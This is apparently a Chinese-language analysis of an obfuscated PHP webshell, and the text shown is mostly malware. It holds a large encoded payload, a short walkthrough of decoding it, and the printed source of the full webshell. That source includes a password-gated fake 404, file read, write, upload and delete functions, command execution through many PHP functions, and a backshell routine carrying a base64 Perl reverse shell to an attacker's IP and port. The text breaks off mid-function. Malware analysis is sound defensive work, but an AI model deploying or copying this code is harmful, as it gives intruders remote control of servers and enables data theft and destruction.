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");
?>

```
- ## 0x03 文件解密

    很明显文件加密了,采用preg_replace 的e修正符代替eval进行代码执行,将
```
var_dump($SQPq);
$SQPq = 'var_dump';//将此变量直接代替为var_dump 看看输出
```

得到
> string(5) "/.*/e"
string(13034) "eval(gzuncompress(base64_decode('eJztfWtzHEdy4GcqQv+....


将内容复制下来,然后对eval进行劫持,并返回解密后字符串
```php
$str = '上边加密的一整段 过多省略。。。';
$str2 = eval(str_replace("eval",'return',$str));
var_dump($str2);
file_put_contents("1res.php",$str2);
```

得到源码:
```
error_reporting(E_ERROR);
@ini_set('display_errors','Off');
@ini_set('max_execution_time',20000);
@ini_set('memory_limit','256M');
if(md5($_SERVER['HTTP_USER_AGENT']."KT1ypIeARt")
!== 'e87a2b5341a27ccdeaafcc167d5f0f2f' ||
md5($_SERVER['HTTP_3CEJNPXWAXN']."KT1ypIeARt")
!=='9c2bc4cba0afbead32963d742bf5e665'){
    header("HTTP/1.1 404 Not Found");
    echo 'No input file specified.';exit();
}
header("content-Type: text/html; charset=gb2312");
function strdir($str) { return str_replace(array('\\','//','%27','%22'),array('/','/','\'','"'),chop($str)); }
function
chkgpc($array) { foreach($array as $key => $var) { $array[$key] =
is_array($var) ? chkgpc($var) : stripslashes($var); } return $array; }
$myfile = $_SERVER['SCRIPT_FILENAME'] ? strdir($_SERVER['SCRIPT_FILENAME']) : strdir(__FILE__);
$myfile = strpos($myfile,'eval()') ? array_shift(explode('(',$myfile)) : $myfile;
define('THISDIR',strdir(dirname($myfile).'/'));
define('ROOTDIR',strdir(strtr($myfile,array(strdir($_SERVER['PHP_SELF']) => '')).'/'));
define('EXISTS_PHPINFO',getinfo() ? true : false);
if(get_magic_quotes_gpc()) { $_POST = chkgpc($_POST); }
$win = substr(PHP_OS,0,3) == 'WIN' ? true : false;
$msg = "信息回显";
function filew($filename,$filedata,$filemode) {
    if((!is_writable($filename)) && file_exists($filename)) { chmod($filename,0666); }
    $handle = fopen($filename,$filemode);
    $key = fputs($handle,$filedata);
    fclose($handle);
    return $key;
}
function filer($filename) {
    $handle = fopen($filename,'r');
    $filedata = fread($handle,filesize($filename));
    fclose($handle);
    return $filedata;
}
function fileu($filenamea,$filenameb) {
    $key = move_uploaded_file($filenamea,$filenameb) ? true : false;
    if(!$key) { $key = copy($filenamea,$filenameb) ? true : false; }
    return $key;
}
function filed($filename) {
    if(!file_exists($filename)) return false;
    ob_end_clean();
    $name = basename($filename);
    $array = explode('.',$name);
    header('Content-type: application/x-'.array_pop($array));
    header('Content-Disposition: attachment; filename='.$name);
    header('Content-Length: '.filesize($filename));
    @readfile($filename);
    exit;
}
function showdir($dir) {
    $dir = strdir($dir.'/');
    if(($handle = @opendir($dir)) == NULL) return false;
    $array = array();
    while(false !== ($name = readdir($handle))) {
        if($name == '.' || $name == '..') continue;
        $path = $dir.$name;
        $name = strtr($name,array('\'' => '%27','"' => '%22'));
        if(is_dir($path)) { $array['dir'][$path] = $name; }
        else { $array['file'][$path] = $name; }
    }
    closedir($handle);
    return $array;
}
function deltree($dir) {
    $handle = @opendir($dir);
    while(false !== ($name = @readdir($handle))) {
        if($name == '.' || $name == '..') continue;
        $path = $dir.$name;
        @chmod($path,0777);
        if(is_dir($path)) { deltree($path.'/'); }
        else { @unlink($path); }
    }
    @closedir($handle);
    return @rmdir($dir);
}
function size($bytes) {
    if($bytes < 1024) return $bytes.' B';
    $array = array('B','K','M','G','T');
    $floor = floor(log($bytes) / log(1024));
    return sprintf('%.2f '.$array[$floor],($bytes/pow(1024,floor($floor))));
}
function find($array,$string) {
    foreach($array as $key) { if(stristr($string,$key)) return true; }
    return false;
}
function scanfile($dir,$key,$inc,$fit,$tye,$chr,$ran,$now) {
    if(($handle = @opendir($dir)) == NULL) return false;
    while(false !== ($name = readdir($handle))) {
        if($name == '.' || $name == '..') continue;
        $path = $dir.$name;

       if(is_dir($path)) { if($fit && in_array($name,$fit))
continue; if($ran == 0 && is_readable($path))
scanfile($path.'/',$key,$inc,$fit,$tye,$chr,$ran,$now); }
        else {
            if($inc && (!find($inc,$name))) continue;
            $code = $tye ? filer($path) : $name;
            $find = $chr ? stristr($code,$key) : (strpos(size(filesize($path)),'M') ? false : (strpos($code,$key) > -1));
            if($find) {
                $file = strtr($path,array($now => '','\'' => '%27','"' => '%22'));
                echo '<a href="javascript:go(\'editor\',\''.$file.'\');">编辑</a> '.$path.'<br>';
                flush(); ob_flush();
            }
            unset($code);
        }
    }
    closedir($handle);
    return true;
}
function antivirus($dir,$exs,$matches,$now) {
    if(($handle = @opendir($dir)) == NULL) return false;
    while(false !== ($name = readdir($handle))) {
        if($name == '.' || $name == '..') continue;
        $path = $dir.$name;
        if(is_dir($path)) { if(is_readable($path)) antivirus($path.'/',$exs,$matches,$now); }
        else {
            $iskill = NULL;
            foreach($exs as $key => $ex) { if(find(explode('|',$ex),$name)) { $iskill = $key; break; } }
            if(strpos(size(filesize($path)),'M')) continue;
            if($iskill) {
                $code = filer($path);
                foreach($matches[$iskill] as $matche) {
                    $array = array();
                    preg_match($matche,$code,$array);
                    if(strpos($array[0],'$this->') || strpos($array[0],'[$vars[')) continue;
                    $len = strlen($array[0]);
                    if($len > 6 && $len < 200) {
                        $file = strtr($path,array($now => '','\'' => '%27','"' => '%22'));

                       echo '特征 <input type="text"
value="'.htmlspecialchars($array[0]).'"> <a
href="javascript:go(\'editor\',\''.$file.'\');">编辑</a>
'.$path.'<br>';
                        flush(); ob_flush(); break;
                    }
                }
                unset($code,$array);
            }
        }
    }
    closedir($handle);
    return true;
}
function command($cmd,$cwd,$com = false) {
    $iswin = substr(PHP_OS,0,3) == 'WIN' ? true : false; $res = $msg = '';
    if($cwd == 'com' || $com) {
        if($iswin && class_exists('COM')) {
            $wscript = new COM('Wscript.Shell');
            $exec = $wscript->exec('c:\\windows\\system32\\cmd.exe /c '.$cmd);
            $stdout = $exec->StdOut();
            $res = $stdout->ReadAll();
            $msg = 'Wscript.Shell';
        }
    } else {
        chdir($cwd); $cwd = getcwd();
        if(function_exists('exec')) { @exec ($cmd,$res); $res = join("\n",$res); $msg = 'exec'; }
        elseif(function_exists('shell_exec')) { $res = @shell_exec ($cmd); $msg = 'shell_exec'; }

       elseif(function_exists('system')) { ob_start(); @system ($cmd);
$res = ob_get_contents(); ob_end_clean(); $msg = 'system'; }
        
elseif(function_exists('passthru')) { ob_start(); @passthru ($cmd); $res
= ob_get_contents(); ob_end_clean(); $msg = 'passthru'; }
        
elseif(function_exists('popen')) { $fp = @popen ($cmd,'r'); if($fp) {
while(!feof($fp)) { $res .= fread($fp,1024); } } @pclose($fp); $msg =
'popen'; }
        elseif(function_exists('proc_open')) {
         
   $env = $iswin ? array('path' => 'c:\\windows\\system32') :
array('path' =>
'/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin');
            $des = array(0 => array("pipe","r"),1 => array("pipe","w"),2 => array("pipe","w"));
            $process = @proc_open ($cmd,$des,$pipes,$cwd,$env);

           if(is_resource($process)) { fwrite($pipes[0],$cmd);
fclose($pipes[0]); $res .= stream_get_contents($pipes[1]);
fclose($pipes[1]); $res .= stream_get_contents($pipes[2]);
fclose($pipes[2]); }
            @proc_close($process);
            $msg = 'proc_open';
        }
    }
    $msg = $res == '' ? '<h1>NULL</h1>' : '<h2>利用'.$msg.'执行成功</h2>';
    return array('res' => $res,'msg' => $msg);
}
function backshell($ip,$port,$dir,$type) {
    $key = false;
    $c_bin = '';
    switch($type) {
        case "pl" :

       $shell =
'IyEvdXNyL2Jpbi9wZXJsIC13DQojIA0KdXNlIHN0cmljdDsNCnVzZSBTb2NrZXQ7DQp1c2UgSU86OkhhbmRsZTsNCm15ICRzcGlkZXJfaXAgPSAkQVJHVlswXTsNCm15ICRzcGlkZXJfcG9ydCA9ICRBUkdWWzFdOw0KbXkgJHByb3RvID0gZ2V0cHJvdG9ieW5hbWUoInRjcCIpOw0KbXkgJHBhY2tfYWRkciA9IHNvY2thZGRyX2luKCRzcGlkZXJfcG9ydCwgaW5ldF9hdG9uKCRzcGlkZXJfaXApKTsNCm15ICRzaGVsbCA9ICcvYmluL3NoIC1pJzsNCnNvY2tldChTT0NLLCBBRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKTsNClNURE9VVC0+YXV0b2ZsdXNoKDEpOw0KU09DSy0+YXV0b2ZsdXNoKDEpOw0KY29ubmVjdChTT0NLLCRwYWNrX2FkZHIpIG9yIGRpZSAiY2FuIG5vdCBjb25uZWN0OiQhIjsNCm9wZW4gU1RESU4sICI8JlNPQ0siOw0Kb3BlbiBTVERPVVQsICI+JlNPQ0siOw0Kb3BlbiBTVERFUlIsICI+JlNPQ0siOw0Kc3lzdGVtKCRzaGVsbCk7DQpjbG9zZSBTT0NLOw0KZXhpdCAwOw0K';
        $file = strdir($dir.'/t00ls.pl');
        $key = filew($file,base64_decode($shell),'w');
        if($key) { @chmod($file,0777); command('/usr/bin/perl '.$file.' '.$ip.' '.$port,$dir); }
        break;
        case "py" :

       $shell =
